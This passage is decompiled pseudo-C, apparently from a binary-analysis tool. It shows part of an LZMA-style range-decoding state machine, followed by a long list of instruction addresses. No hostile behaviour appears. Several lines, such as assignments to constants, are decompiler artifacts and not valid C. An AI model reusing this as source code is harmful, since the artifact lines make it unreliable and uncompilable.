											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
										case 0x12:
											goto L0;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											goto L149;
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L120:
												_t394 = __ebp - 0x2c;
												 *_t394 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t394;
												L121:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t401 = __ebp - 0x60;
												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t401;
												goto L124;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L103:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L109:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L113:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t392 = __ebp - 0x2c;
														 *_t392 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t392;
														goto L120;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L112:
														_t369 = __ebp - 0x48;
														 *_t369 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t369;
														goto L113;
													} else {
														goto L110;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L102:
													_t339 = __ebp - 0x48;
													 *_t339 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t339;
													goto L103;
												} else {
													goto L100;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L109;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L124:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t415 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t415;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t415;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											L170:
											_push(0x22);
											_pop(_t567);
											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
											_t535 = 0;
											L172:
											return _t535;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
						__eax =  *(__ebp - 0x50);
						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
						__eax =  *(__ebp - 0x58);
						__esi = __edx + __eax;
						 *(__ebp - 0x54) = __esi;
						__ax =  *__esi;
						__edi = __ax & 0x0000ffff;
						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
						if( *(__ebp - 0xc) >= __ecx) {
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
							__cx = __ax;
							__cx = __ax >> 5;
							__eax = __eax - __ecx;
							__edx = __edx + 1;
							 *__esi = __ax;
							 *(__ebp - 0x50) = __edx;
						} else {
							 *(__ebp - 0x10) = __ecx;
							0x800 = 0x800 - __edi;
							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
							 *__esi = __cx;
						}
						if( *(__ebp - 0x10) >= 0x1000000) {
							goto L148;
						} else {
							goto L146;
						}
					}
					goto L1;
				}
			}








                                                                                                                                    0x00000000
                                                                                                                                    0x00407395
                                                                                                                                    0x00407395
                                                                                                                                    0x00407399
                                                                                                                                    0x004073be
                                                                                                                                    0x004073c8
                                                                                                                                    0x00000000
                                                                                                                                    0x0040739b
                                                                                                                                    0x0040739b
                                                                                                                                    0x0040739e
                                                                                                                                    0x004073a2
                                                                                                                                    0x004073a5
                                                                                                                                    0x004073a8
                                                                                                                                    0x004073ac
                                                                                                                                    0x004073ac
                                                                                                                                    0x004073af
                                                                                                                                    0x00407489
                                                                                                                                    0x00407489
                                                                                                                                    0x00407490
                                                                                                                                    0x00407490
                                                                                                                                    0x00407493
                                                                                                                                    0x0040749a
                                                                                                                                    0x004074c7
                                                                                                                                    0x004074cb
                                                                                                                                    0x0040752b
                                                                                                                                    0x0040752e
                                                                                                                                    0x00407533
                                                                                                                                    0x00407534
                                                                                                                                    0x00407536
                                                                                                                                    0x00407538
                                                                                                                                    0x0040753b
                                                                                                                                    0x00407447
                                                                                                                                    0x00407447
                                                                                                                                    0x00407447
                                                                                                                                    0x00406be3
                                                                                                                                    0x00406be3
                                                                                                                                    0x00406be3
                                                                                                                                    0x00406bec
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406bf2
                                                                                                                                    0x00000000
                                                                                                                                    0x00406bfd
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406c06
                                                                                                                                    0x00406c09
                                                                                                                                    0x00406c0c
                                                                                                                                    0x00406c10
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406c16
                                                                                                                                    0x00406c19
                                                                                                                                    0x00406c1b
                                                                                                                                    0x00406c1c
                                                                                                                                    0x00406c1f
                                                                                                                                    0x00406c21
                                                                                                                                    0x00406c22
                                                                                                                                    0x00406c24
                                                                                                                                    0x00406c27
                                                                                                                                    0x00406c2c
                                                                                                                                    0x00406c31
                                                                                                                                    0x00406c3a
                                                                                                                                    0x00406c4d
                                                                                                                                    0x00406c50
                                                                                                                                    0x00406c5c
                                                                                                                                    0x00406c84
                                                                                                                                    0x00406c86
                                                                                                                                    0x00406c94
                                                                                                                                    0x00406c94
                                                                                                                                    0x00406c98
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406c88
                                                                                                                                    0x00406c88
                                                                                                                                    0x00406c8b
                                                                                                                                    0x00406c8c
                                                                                                                                    0x00406c8c
                                                                                                                                    0x00000000
                                                                                                                                    0x00406c88
                                                                                                                                    0x00406c62
                                                                                                                                    0x00406c67
                                                                                                                                    0x00406c67
                                                                                                                                    0x00406c70
                                                                                                                                    0x00406c78
                                                                                                                                    0x00406c7b
                                                                                                                                    0x00000000
                                                                                                                                    0x00406c81
                                                                                                                                    0x00406c81
                                                                                                                                    0x00000000
                                                                                                                                    0x00406c81
                                                                                                                                    0x00000000
                                                                                                                                    0x00406c9e
                                                                                                                                    0x00406c9e
                                                                                                                                    0x00406ca2
                                                                                                                                    0x0040754e
                                                                                                                                    0x00000000
                                                                                                                                    0x0040754e
                                                                                                                                    0x00406cab
                                                                                                                                    0x00406cbb
                                                                                                                                    0x00406cbe
                                                                                                                                    0x00406cc1
                                                                                                                                    0x00406cc1
                                                                                                                                    0x00406cc1
                                                                                                                                    0x00406cc4
                                                                                                                                    0x00406cc8
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406cca
                                                                                                                                    0x00406cd0
                                                                                                                                    0x00406cfa
                                                                                                                                    0x00406d00
                                                                                                                                    0x00406d07
                                                                                                                                    0x00000000
                                                                                                                                    0x00406d07
                                                                                                                                    0x00406cd6
                                                                                                                                    0x00406cd9
                                                                                                                                    0x00406cde
                                                                                                                                    0x00406cde
                                                                                                                                    0x00406ce9
                                                                                                                                    0x00406cf1
                                                                                                                                    0x00406cf4
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406d39
                                                                                                                                    0x00406d3f
                                                                                                                                    0x00406d42
                                                                                                                                    0x00406d4f
                                                                                                                                    0x00406d57
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406d0e
                                                                                                                                    0x00406d0e
                                                                                                                                    0x00406d12
                                                                                                                                    0x0040755d
                                                                                                                                    0x00000000
                                                                                                                                    0x0040755d
                                                                                                                                    0x00406d1e
                                                                                                                                    0x00406d29
                                                                                                                                    0x00406d29
                                                                                                                                    0x00406d29
                                                                                                                                    0x00406d2c
                                                                                                                                    0x00406d2f
                                                                                                                                    0x00406d32
                                                                                                                                    0x00406d37
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004073ce
                                                                                                                                    0x004073ce
                                                                                                                                    0x004073d4
                                                                                                                                    0x004073da
                                                                                                                                    0x004073e0
                                                                                                                                    0x004073fa
                                                                                                                                    0x004073fd
                                                                                                                                    0x00407403
                                                                                                                                    0x0040740e
                                                                                                                                    0x0040740e
                                                                                                                                    0x00407410
                                                                                                                                    0x004073e2
                                                                                                                                    0x004073e2
                                                                                                                                    0x004073f1
                                                                                                                                    0x004073f5
                                                                                                                                    0x004073f5
                                                                                                                                    0x0040741a
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0040741c
                                                                                                                                    0x00407420
                                                                                                                                    0x004075cf
                                                                                                                                    0x00000000
                                                                                                                                    0x004075cf
                                                                                                                                    0x0040742c
                                                                                                                                    0x00407433
                                                                                                                                    0x0040743b
                                                                                                                                    0x0040743e
                                                                                                                                    0x00407441
                                                                                                                                    0x00407441
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406d5f
                                                                                                                                    0x00406d61
                                                                                                                                    0x00406d64
                                                                                                                                    0x00406dd5
                                                                                                                                    0x00406dd8
                                                                                                                                    0x00406ddb
                                                                                                                                    0x00406de2
                                                                                                                                    0x00406dec
                                                                                                                                    0x00000000
                                                                                                                                    0x00406dec
                                                                                                                                    0x00406d66
                                                                                                                                    0x00406d6a
                                                                                                                                    0x00406d6d
                                                                                                                                    0x00406d6f
                                                                                                                                    0x00406d72
                                                                                                                                    0x00406d75
                                                                                                                                    0x00406d77
                                                                                                                                    0x00406d7a
                                                                                                                                    0x00406d7c
                                                                                                                                    0x00406d81
                                                                                                                                    0x00406d84
                                                                                                                                    0x00406d87
                                                                                                                                    0x00406d8b
                                                                                                                                    0x00406d92
                                                                                                                                    0x00406d95
                                                                                                                                    0x00406d9c
                                                                                                                                    0x00406da0
                                                                                                                                    0x00406da8
                                                                                                                                    0x00406da8
                                                                                                                                    0x00406da8
                                                                                                                                    0x00406da2
                                                                                                                                    0x00406da2
                                                                                                                                    0x00406da2
                                                                                                                                    0x00406d97
                                                                                                                                    0x00406d97
                                                                                                                                    0x00406d97
                                                                                                                                    0x00406dac
                                                                                                                                    0x00406daf
                                                                                                                                    0x00406dcd
                                                                                                                                    0x00406dcf
                                                                                                                                    0x00000000
                                                                                                                                    0x00406db1
                                                                                                                                    0x00406db1
                                                                                                                                    0x00406db4
                                                                                                                                    0x00406db7
                                                                                                                                    0x00406dba
                                                                                                                                    0x00406dbc
                                                                                                                                    0x00406dbc
                                                                                                                                    0x00406dbc
                                                                                                                                    0x00406dbf
                                                                                                                                    0x00406dc2
                                                                                                                                    0x00406dc4
                                                                                                                                    0x00406dc5
                                                                                                                                    0x00406dc8
                                                                                                                                    0x00000000
                                                                                                                                    0x00406dc8
                                                                                                                                    0x00000000
                                                                                                                                    0x00406ffe
                                                                                                                                    0x00407002
                                                                                                                                    0x00407020
                                                                                                                                    0x00407023
                                                                                                                                    0x0040702a
                                                                                                                                    0x0040702d
                                                                                                                                    0x00407030
                                                                                                                                    0x00407033
                                                                                                                                    0x00407036
                                                                                                                                    0x00407039
                                                                                                                                    0x0040703b
                                                                                                                                    0x00407042
                                                                                                                                    0x00407043
                                                                                                                                    0x00407045
                                                                                                                                    0x00407048
                                                                                                                                    0x0040704b
                                                                                                                                    0x0040704e
                                                                                                                                    0x0040704e
                                                                                                                                    0x00407053
                                                                                                                                    0x00000000
                                                                                                                                    0x00407053
                                                                                                                                    0x00407004
                                                                                                                                    0x00407007
                                                                                                                                    0x0040700a
                                                                                                                                    0x00407014
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00407068
                                                                                                                                    0x0040706c
                                                                                                                                    0x0040708f
                                                                                                                                    0x00407092
                                                                                                                                    0x00407095
                                                                                                                                    0x0040709f
                                                                                                                                    0x0040706e
                                                                                                                                    0x0040706e
                                                                                                                                    0x00407071
                                                                                                                                    0x00407074
                                                                                                                                    0x00407077
                                                                                                                                    0x00407084
                                                                                                                                    0x00407087
                                                                                                                                    0x00407087
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004070ab
                                                                                                                                    0x004070af
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004070b5
                                                                                                                                    0x004070b9
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004070bf
                                                                                                                                    0x004070c1
                                                                                                                                    0x004070c5
                                                                                                                                    0x004070c5
                                                                                                                                    0x004070c8
                                                                                                                                    0x004070cc
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0040711c
                                                                                                                                    0x00407120
                                                                                                                                    0x00407127
                                                                                                                                    0x0040712a
                                                                                                                                    0x0040712d
                                                                                                                                    0x00407137
                                                                                                                                    0x00000000
                                                                                                                                    0x00407137
                                                                                                                                    0x00407122
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00407143
                                                                                                                                    0x00407147
                                                                                                                                    0x0040714e
                                                                                                                                    0x00407151
                                                                                                                                    0x00407154
                                                                                                                                    0x00407149
                                                                                                                                    0x00407149
                                                                                                                                    0x00407149
                                                                                                                                    0x00407157
                                                                                                                                    0x0040715a
                                                                                                                                    0x0040715d
                                                                                                                                    0x0040715d
                                                                                                                                    0x00407160
                                                                                                                                    0x00407163
                                                                                                                                    0x00407166
                                                                                                                                    0x00407166
                                                                                                                                    0x00407169
                                                                                                                                    0x00407170
                                                                                                                                    0x00407175
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00407203
                                                                                                                                    0x00407203
                                                                                                                                    0x00407207
                                                                                                                                    0x004075a5
                                                                                                                                    0x00000000
                                                                                                                                    0x004075a5
                                                                                                                                    0x0040720d
                                                                                                                                    0x00407210
                                                                                                                                    0x00407213
                                                                                                                                    0x00407217
                                                                                                                                    0x0040721a
                                                                                                                                    0x00407220
                                                                                                                                    0x00407222
                                                                                                                                    0x00407222
                                                                                                                                    0x00407222
                                                                                                                                    0x00407225
                                                                                                                                    0x00407228
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406df8
                                                                                                                                    0x00406df8
                                                                                                                                    0x00406dfc
                                                                                                                                    0x00407569
                                                                                                                                    0x00000000
                                                                                                                                    0x00407569
                                                                                                                                    0x00406e02
                                                                                                                                    0x00406e05
                                                                                                                                    0x00406e08
                                                                                                                                    0x00406e0c
                                                                                                                                    0x00406e0f
                                                                                                                                    0x00406e15
                                                                                                                                    0x00406e17
                                                                                                                                    0x00406e17
                                                                                                                                    0x00406e17
                                                                                                                                    0x00406e1a
                                                                                                                                    0x00406e1d
                                                                                                                                    0x00406e1d
                                                                                                                                    0x00406e20
